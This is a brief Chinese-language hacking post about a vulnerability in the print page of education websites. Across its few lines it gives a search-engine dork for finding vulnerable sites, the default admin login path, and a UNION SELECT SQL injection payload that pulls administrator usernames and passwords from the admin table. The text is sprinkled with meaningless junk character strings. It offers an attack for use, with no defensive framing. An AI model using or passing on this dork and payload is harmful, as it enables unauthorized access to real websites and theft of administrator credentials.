教育站打印页面漏洞
# N. o4 w, g9 V5 N$ |6 t X! b百度或google搜索 inurl:info_Print.asp?ArticleID=; F# A3 m+ A4 y0 c' R# L! F G: p
默认后台:/ad_login.asp
1 Q% V f( g6 v爆管理员密码:
* C& U( A0 I4 q4 y0 }在 域名/inurl:info_Print.asp?ArticleID=数字 后边加空格,然后加下边的红色语句,回车即可/ x5 `& |6 @8 |$ ], ?
: N$ U$ R5 m4 @! C' y- x
union select 1,2,username,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin
% o: W3 J2 t# o) k: G1 C
7 v: M# \) w2 c" _; ` T作者:佚名 * v9 w6 ?6 v: v6 N7 R
$ v, Z n$ I D' b/ T
' j( S/ d" N6 K) Y |